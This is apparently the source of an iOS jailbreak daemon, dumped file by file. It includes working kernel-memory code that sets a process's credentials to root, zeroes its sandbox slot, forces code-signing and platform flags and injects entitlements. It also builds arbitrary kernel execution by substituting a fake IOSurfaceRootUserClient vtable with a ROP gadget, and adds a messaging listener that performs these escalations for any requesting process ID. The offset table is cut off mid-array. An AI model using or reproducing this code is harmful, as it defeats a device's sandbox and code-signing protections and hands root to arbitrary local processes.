--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "offsetof.h"
6 | #include "jelbrek.h"
7 | #include
8 | #include "kexecute.h"
9 |
10 |
11 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base) {
12 | init_kernel_utils(tfp0);
13 | init_kernel(kernel_base, NULL);
14 | }
15 |
16 | BOOL unsandbox(pid_t pid) {
17 | uint64_t proc = proc_for_pid(pid);
18 | uint64_t ucred = kread64(proc + offsetof_p_ucred); //our credentials
19 | kwrite64(kread64(ucred + 0x78) + 8 + 8, 0x0); //get rid of sandbox by writing 0x0 to it
20 |
21 | return (kread64(kread64(ucred + 0x78) + 8 + 8) == 0) ? YES : NO;
22 | }
23 |
24 | void setcsflags(pid_t pid) {
25 | uint64_t proc = proc_for_pid(pid);
26 | uint32_t csflags = kread32(proc + offsetof_p_csflags);
27 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
28 | kwrite32(proc + offsetof_p_csflags, csflags);
29 | }
30 |
31 | void platformize(pid_t pid) {
32 | uint64_t proc = proc_for_pid(pid);
33 | NSLog(@"Platformizing process at address 0x%llx\n", proc);
34 | uint64_t task = kread64(proc + offsetof_task);
35 | uint32_t t_flags = kread32(task + offsetof_t_flags);
36 | t_flags |= 0x400;
37 | NSLog(@"Flicking on task @0x%llx t->flags to have TF_PLATFORM (0x%x)..\n", task, t_flags);
38 | kwrite32(task+offsetof_t_flags, t_flags);
39 | uint32_t csflags = kread32(proc + offsetof_p_csflags);
40 | kwrite32(proc + offsetof_p_csflags, csflags | 0x24004001u);
41 | }
42 |
43 | BOOL get_root(pid_t pid) {
44 | uint64_t proc = proc_for_pid(pid);
45 | uint64_t ucred = kread64(proc + offsetof_p_ucred);
46 | //make everything 0 without setuid(0), pretty straightforward.
47 | kwrite32(proc + offsetof_p_uid, 0);
48 | kwrite32(proc + offsetof_p_ruid, 0);
49 | kwrite32(proc + offsetof_p_gid, 0);
50 | kwrite32(proc + offsetof_p_rgid, 0);
51 | kwrite32(ucred + offsetof_ucred_cr_uid, 0);
52 | kwrite32(ucred + offsetof_ucred_cr_ruid, 0);
53 | kwrite32(ucred + offsetof_ucred_cr_svuid, 0);
54 | kwrite32(ucred + offsetof_ucred_cr_ngroups, 1);
55 | kwrite32(ucred + offsetof_ucred_cr_groups, 0);
56 | kwrite32(ucred + offsetof_ucred_cr_rgid, 0);
57 | kwrite32(ucred + offsetof_ucred_cr_svgid, 0);
58 |
59 | return (geteuid() == 0) ? YES : NO;
60 | }
61 | void entitlePid(pid_t pid, const char *ent1, _Bool val1) {
62 | uint64_t proc = proc_for_pid(pid);
63 | uint64_t ucred = kread64(proc+0x100);
64 | uint64_t entitlements = kread64(kread64(ucred+0x78)+0x8);
65 |
66 | uint64_t current = OSDictionary_GetItem(entitlements, ent1);
67 |
68 | if (current == 0) {
69 | usleep(1000);
70 | NSLog(@"[*] Setting Entitlements...");
71 | NSLog(@"before: %s is 0x%llx", ent1, current);
72 | usleep(1000);
73 | OSDictionary_SetItem(entitlements, ent1, (val1) ? find_OSBoolean_True() : find_OSBoolean_False());
74 | usleep(1000);
75 | NSLog(@"after: %s is 0x%llx", ent1, OSDictionary_GetItem(entitlements, ent1));
76 | }
77 | }
78 |
79 |
80 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kern_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // fun_utils.h
3 | // async_wake_ios
4 | //
5 | // Created by George on 18/12/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 | // Needed definitions
24 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
25 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
26 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
27 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);
28 |
29 | // "General" purpose
30 | uint8_t *get_sha256(uint8_t* code_dir);
31 | uint8_t *get_code_directory(const char* name);
32 | int cp(const char *from, const char *to);
33 | int file_exist(char *filename);
34 |
35 | // Kernel utility stuff
36 | void init_kernel_utils(mach_port_t tfp0);
37 | uint64_t kalloc(vm_size_t size);
38 | void kfree(mach_vm_address_t address, vm_size_t size);
39 | size_t kread(uint64_t where, void *p, size_t size);
40 | uint32_t kread32(uint64_t where);
41 | uint64_t kread64(uint64_t where);
42 | size_t kwrite(uint64_t where, const void *p, size_t size);
43 | void kwrite32(uint64_t where, uint32_t what);
44 | void kwrite64(uint64_t where, uint64_t what);
45 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
46 | mach_port_t fake_host_priv(void);
47 | uint64_t zm_fix_addr(uint64_t addr);
48 | uint64_t proc_for_pid(pid_t pid);
49 | uint64_t proc_for_name(char *nm);
50 | unsigned int pid_for_name(char *nm);
51 | uint64_t find_port_address(mach_port_name_t port);
52 | uint64_t task_self_addr(void);
53 | uint64_t kmem_alloc_wired(uint64_t size);
54 | #endif /* fun_utils_h */
55 |
56 | #define DEBUG_LOG //comment this line if you don't want to debug into /var/log
57 | #ifndef DEBUG_LOG
58 | #define NSLog(str, ...) fprintf(stdout, (char*)[str UTF8String], __VA_ARGS__) && NSLog(str, __VA_ARGS__)
59 | #endif
60 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
5 | void init_kexecute(void);
6 | void term_kexecute(void);
7 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/kexecute.m:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include "kern_utils.h"
4 | #include "kexecute.h"
5 | #include "patchfinder64.h"
6 | #include "offsetof.h"
7 | #include
8 |
9 | mach_port_t prepare_user_client(void) {
10 | kern_return_t err;
11 | mach_port_t user_client;
12 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
13 |
14 | if (service == IO_OBJECT_NULL){
15 | NSLog(@" [-] unable to find service\n");
16 | exit(EXIT_FAILURE);
17 | }
18 |
19 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
20 | if (err != KERN_SUCCESS){
21 | NSLog(@" [-] unable to get user client connection\n");
22 | exit(EXIT_FAILURE);
23 | }
24 |
25 |
26 | //
27 | NSLog(@"got user client: 0x%x\n", user_client);
28 | return user_client;
29 | }
30 |
31 | // TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
32 | pthread_mutex_t kexecute_lock;
33 | static mach_port_t user_client;
34 | static uint64_t IOSurfaceRootUserClient_port;
35 | static uint64_t IOSurfaceRootUserClient_addr;
36 | static uint64_t fake_vtable;
37 | static uint64_t fake_client;
38 | const int fake_kalloc_size = 0x1000;
39 |
40 | void init_kexecute(void) {
41 | user_client = prepare_user_client();
42 |
43 | // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
44 | IOSurfaceRootUserClient_port = find_port_address(user_client); // UserClients are just mach_ports, so we find its address
45 | //
46 | NSLog(@"Found port: 0x%llx\n", IOSurfaceRootUserClient_port);
47 |
48 | IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject); // The UserClient itself (the C++ object) is at the kobject field
49 | //
50 | NSLog(@"Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);
51 |
52 | uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
53 | //
54 | NSLog(@"Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);
55 |
56 | // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
57 | // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
58 |
59 |
60 | // Create the vtable in the kernel memory, then copy the existing vtable into there
61 | fake_vtable = kalloc(fake_kalloc_size);
62 | //
63 | NSLog(@"Created fake_vtable at %016llx\n", fake_vtable);
64 |
65 | for (int i = 0; i < 0x200; i++) {
66 | kwrite64(fake_vtable+i*8, kread64(IOSurfaceRootUserClient_vtab+i*8));
67 | }
68 |
69 | //
70 | NSLog(@"Copied some of the vtable over\n");
71 |
72 | // Create the fake user client
73 | fake_client = kalloc(fake_kalloc_size);
74 | //
75 | NSLog(@"Created fake_client at %016llx\n", fake_client);
76 |
77 | for (int i = 0; i < 0x200; i++) {
78 | kwrite64(fake_client+i*8, kread64(IOSurfaceRootUserClient_addr+i*8));
79 | }
80 |
81 | //
82 | NSLog(@"Copied the user client over\n");
83 |
84 | // Write our fake vtable into the fake user client
85 | kwrite64(fake_client, fake_vtable);
86 |
87 | // Replace the user client with ours
88 | kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);
89 |
90 | // Now the userclient port we have will look into our fake user client rather than the old one
91 |
92 | // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
93 | kwrite64(fake_vtable+8*0xB7, find_add_x0_x0_0x40_ret());
94 |
95 | //
96 | NSLog(@"Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");
97 |
98 | pthread_mutex_init(&kexecute_lock, NULL);
99 | }
100 |
101 | void term_kexecute(void) {
102 | kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, IOSurfaceRootUserClient_addr);
103 | kfree(fake_vtable, fake_kalloc_size);
104 | kfree(fake_client, fake_kalloc_size);
105 | }
106 |
107 | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
108 | pthread_mutex_lock(&kexecute_lock);
109 |
110 | // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
111 | // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
112 | // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
113 | // function is called with the first arguement being the object (referenced as `this`). Because of that, the first argument of any function we call is the object, and everything else is passed
114 | // through like normal.
115 |
116 | // Because the gadget gets the trap at user_client+0x40, we have to overwrite the contents of it
117 | // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
118 | // (i'm not actually sure if the switch back is necessary but meh)
119 |
120 | uint64_t offx20 = kread64(fake_client+0x40);
121 | uint64_t offx28 = kread64(fake_client+0x48);
122 | kwrite64(fake_client+0x40, x0);
123 | kwrite64(fake_client+0x48, addr);
124 | uint64_t returnval = IOConnectTrap6(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));
125 | kwrite64(fake_client+0x40, offx20);
126 | kwrite64(fake_client+0x48, offx28);
127 |
128 | pthread_mutex_unlock(&kexecute_lock);
129 |
130 | return returnval;
131 | }
132 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/main.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "jelbrek.h"
6 | #include
7 | #include "offsets.h"
8 |
9 | mach_port_t tfp0;
10 | uint64_t kernel_base;
11 | uint64_t kernel_slide;
12 | int pid;
13 |
14 |
15 | @interface Listener : NSObject
16 | - (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo;
17 | - (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo;
18 | - (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo;
19 | - (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo;
20 | - (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo;
21 | -(id)init;
22 | @end
23 |
24 | @implementation Listener
25 | -(id)init {
26 |
27 | NSLog(@"Listening...");
28 |
29 | CPDistributedMessagingCenter *messagingCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"]; //CPDistributedMessagingCenter is a great way to send messages between processes, without advanced knowledge at all. Why bother with Electra's way when the system offers APIs to handle all the messages?
30 | [messagingCenter runServerOnCurrentThread];
31 | [messagingCenter registerForMessageName:@"rootme" target:self selector:@selector(rootme:message:)];
32 | [messagingCenter registerForMessageName:@"unsandbox" target:self selector:@selector(unsandbox:message:)];
33 | [messagingCenter registerForMessageName:@"platformize" target:self selector:@selector(platformize:message:)];
34 | [messagingCenter registerForMessageName:@"entitle" target:self selector:@selector(entitle:message:)];
35 | [messagingCenter registerForMessageName:@"setcsflags" target:self selector:@selector(setcsflags:message:)];
36 |
37 | CFRunLoopRun(); //this ensures that the binary will keep running
38 | }
39 |
40 | - (NSDictionary *)rootme:(NSString *)name message:(NSDictionary *)userInfo {
41 | pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
42 | NSLog(@"[*] Got request from pid %d\n", pid);
43 | get_root(pid);
44 | return 0;
45 | }
46 |
47 | - (NSDictionary *)unsandbox:(NSString *)name message:(NSDictionary *)userInfo {
48 | pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
49 | NSLog(@"[*] Got request from pid %d\n", pid);
50 | unsandbox(pid);
51 | return 0;
52 | }
53 | - (NSDictionary *)platformize:(NSString *)name message:(NSDictionary *)userInfo {
54 | pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
55 | NSLog(@"[*] Got request from pid %d\n", pid);
56 | platformize(pid);
57 | return 0;
58 | }
59 | - (NSDictionary *)entitle:(NSString *)name message:(NSDictionary *)userInfo {
60 | pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
61 | NSLog(@"[*] Got request from pid %d\n", pid);
62 | char *ent = [[userInfo objectForKey:@"ent"] UTF8String];
63 | NSString *val = [userInfo objectForKey:@"value"];
64 | BOOL valb;
65 | if ([val isEqualToString:@"true"]) valb = true;
66 | else if ([val isEqualToString:@"false"]) valb = false;
67 | else {
68 | fprintf(stderr, "Error, entitlement value not a boolean\n");
69 | return 0;
70 | }
71 | entitlePid(pid, ent, valb);
72 | return 0;
73 | }
74 | - (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo {
75 | pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
76 | NSLog(@"[*] Got request from pid %d\n", pid);
77 | setcsflags(pid);
78 | return 0;
79 | }
80 | @end
81 |
82 | kern_return_t init_tfp0() {
83 | fprintf(stdout, "[*] Initializing jailbreakd\n");
84 |
85 | kern_return_t ret = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &tfp0);
86 |
87 | if (ret != KERN_SUCCESS) {
88 | fprintf(stderr,"[*] ERROR: host_get_special_port 4: %s\n", mach_error_string(err));
89 | return -1;
90 | }
91 | NSLog(@"[*] Got tfp0!\n");
92 |
93 | kernel_base = strtoull(getenv("KernelBase"), NULL, 16);
94 | kernel_slide = kernel_base - 0xFFFFFFF007004000;
95 | NSLog(@"[*] kaslr slide: 0x%016llx\n", kernel_slide);
96 |
97 | init_jelbrek(tfp0, kernel_base);
98 |
99 | return ret;
100 | }
101 |
102 |
103 | int main(int argc, char **argv, char **envp) {
104 | remove_memory_limit(); //Electra's jailbreakd does this and since I don't wanna run into trouble with memory I'm doing it too
105 | offsets_init();
106 | init_tfp0();
107 |
108 | //cache addresses
109 | find_allproc();
110 | find_add_x0_x0_0x40_ret();
111 | find_OSBoolean_True();
112 | find_OSBoolean_False();
113 | find_zone_map_ref();
114 | find_osunserializexml();
115 | find_smalloc();
116 | init_kexecute();
117 |
118 | term_kernel();
119 |
120 |
121 | [[Listener alloc] init]; //allocate a new listener and start listening!
122 | return 0;
123 | }
124 |
125 | // vim:ft=objc
126 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/make.sh:
--------------------------------------------------------------------------------
1 | make clean && make && cp .theos/obj/debug/jailbreakd jailbreakd
2 | ldid -Sent.xml jailbreakd
3 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.c:
--------------------------------------------------------------------------------
1 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
2 | unsigned offsetof_task = 0x18; // proc_t::task
3 | unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
4 | unsigned offsetof_p_gid = 0x34; // proc_t::p_uid
5 | unsigned offsetof_p_ruid = 0x38; // proc_t::p_uid
6 | unsigned offsetof_p_rgid = 0x3c; // proc_t::p_uid
7 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
8 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
9 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
10 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
11 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
12 | unsigned offsetof_itk_space = 0x308; // task_t::itk_space
13 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
14 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
15 | unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject
16 | unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
17 | unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
18 | unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
19 | unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
20 | unsigned offsetof_special = 2 * sizeof(long); // host::special
21 | unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..
22 |
23 | unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
24 | unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
25 | unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
26 | unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
27 | unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups
28 | unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
29 | unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid
30 |
31 | unsigned offsetof_v_type = 0x70; // vnode::v_type
32 | unsigned offsetof_v_id = 0x74; // vnode::v_id
33 | unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo
34 |
35 | unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs
36 |
37 | unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
38 | unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
39 | unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
40 | unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
41 | unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
42 | unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
43 | unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path
44 |
45 | unsigned offsetof_t_flags = 0x3a0; // task::t_flags
46 |
47 | unsigned offsetof_v_mount = 0xd8; // vnode::v_mount
48 | unsigned offsetof_v_specinfo = 0x78; // vnode::v_specinfo
49 | unsigned offsetof_specflags = 0x10;
50 | unsigned offsetof_mnt_flag = 0x70; // mount::mnt_flag
51 | unsigned offsetof_mnt_data = 0x8f8; // mount::mnt_data
52 |
53 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.h:
--------------------------------------------------------------------------------
1 |
2 | extern unsigned offsetof_p_pid;
3 | extern unsigned offsetof_task;
4 | extern unsigned offsetof_p_uid;
5 | extern unsigned offsetof_p_gid;
6 | extern unsigned offsetof_p_ruid;
7 | extern unsigned offsetof_p_rgid;
8 | extern unsigned offsetof_p_ucred;
9 | extern unsigned offsetof_p_csflags;
10 | extern unsigned offsetof_itk_self;
11 | extern unsigned offsetof_itk_sself;
12 | extern unsigned offsetof_itk_bootstrap;
13 | extern unsigned offsetof_itk_space;
14 | extern unsigned offsetof_ip_mscount;
15 | extern unsigned offsetof_ip_srights;
16 | extern unsigned offsetof_ip_kobject;
17 | extern unsigned offsetof_p_textvp;
18 | extern unsigned offsetof_p_textoff;
19 | extern unsigned offsetof_p_cputype;
20 | extern unsigned offsetof_p_cpu_subtype;
21 | extern unsigned offsetof_special;
22 | extern unsigned offsetof_ipc_space_is_table;
23 |
24 | extern unsigned offsetof_ucred_cr_uid;
25 | extern unsigned offsetof_ucred_cr_ruid;
26 | extern unsigned offsetof_ucred_cr_gid;
27 | extern unsigned offsetof_ucred_cr_rgid;
28 | extern unsigned offsetof_ucred_cr_svgid;
29 | extern unsigned offsetof_ucred_cr_groups;
30 | extern unsigned offsetof_ucred_cr_ngroups;
31 | extern unsigned offsetof_ucred_cr_svuid;
32 |
33 | extern unsigned offsetof_v_type;
34 | extern unsigned offsetof_v_id;
35 | extern unsigned offsetof_v_ubcinfo;
36 |
37 | extern unsigned offsetof_ubcinfo_csblobs;
38 |
39 | extern unsigned offsetof_csb_cputype;
40 | extern unsigned offsetof_csb_flags;
41 | extern unsigned offsetof_csb_base_offset;
42 | extern unsigned offsetof_csb_entitlements_offset;
43 | extern unsigned offsetof_csb_signer_type;
44 | extern unsigned offsetof_csb_platform_binary;
45 | extern unsigned offsetof_csb_platform_path;
46 |
47 | extern unsigned offsetof_t_flags;
48 |
49 | extern unsigned offsetof_v_mount;
50 | extern unsigned offsetof_v_specinfo;
51 | extern unsigned offsetof_specflags;
52 | extern unsigned offsetof_mnt_flag;
53 | extern unsigned offsetof_mnt_data;
54 |
55 | #define CS_VALID 0x0000001 /* dynamically valid */
56 | #define CS_ADHOC 0x0000002 /* ad hoc signed */
57 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
58 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */
59 |
60 | #define CS_HARD 0x0000100 /* don't load invalid pages */
61 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */
62 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
63 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
64 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */
65 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */
66 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000
67 |
68 | #define CS_ALLOWED_MACHO 0x00ffffe
69 |
70 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
71 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
72 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
73 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
74 |
75 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
76 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
77 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
78 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
79 |
80 | #define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
81 | #define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
82 | #define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 |
84 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef offsets_h
2 | #define offsets_h
3 |
4 | enum kstruct_offset {
5 | /* struct task */
6 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
7 | KSTRUCT_OFFSET_TASK_REF_COUNT,
8 | KSTRUCT_OFFSET_TASK_ACTIVE,
9 | KSTRUCT_OFFSET_TASK_VM_MAP,
10 | KSTRUCT_OFFSET_TASK_NEXT,
11 | KSTRUCT_OFFSET_TASK_PREV,
12 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
13 | KSTRUCT_OFFSET_TASK_BSD_INFO,
14 |
15 | /* struct ipc_port */
16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
18 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
19 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
20 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
21 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
23 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
24 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
25 |
26 | /* struct proc */
27 | KSTRUCT_OFFSET_PROC_PID,
28 | KSTRUCT_OFFSET_PROC_P_FD,
29 |
30 | /* struct filedesc */
31 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
32 |
33 | /* struct fileproc */
34 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
35 |
36 | /* struct fileglob */
37 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
38 |
39 | /* struct socket */
40 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
41 |
42 | /* struct pipe */
43 | KSTRUCT_OFFSET_PIPE_BUFFER,
44 |
45 | /* struct ipc_space */
46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
48 |
49 | KFREE_ADDR_OFFSET,
50 | };
51 |
52 | int koffset(enum kstruct_offset offset);
53 | void offsets_init(void);
54 |
55 | #endif
56 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #include "offsets.h"
10 |
11 | int* offsets = NULL;
12 |
13 | int kstruct_offsets_11_0[] = {
14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
17 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
22 |
23 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
25 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
26 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
27 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
28 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
29 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
30 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
31 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
32 |
33 | 0x10, // KSTRUCT_OFFSET_PROC_PID,
34 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD
35 |
36 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
37 |
38 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
39 |
40 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
41 |
42 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB
43 |
44 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER
45 |
46 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
47 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
48 |
49 | 0x6c, // KFREE_ADDR_OFFSET
50 | };
51 |
52 | int kstruct_offsets_11_3[] = {
53 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
54 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
55 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
56 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
57 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
58 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
59 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
60 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
61 |
62 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
63 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
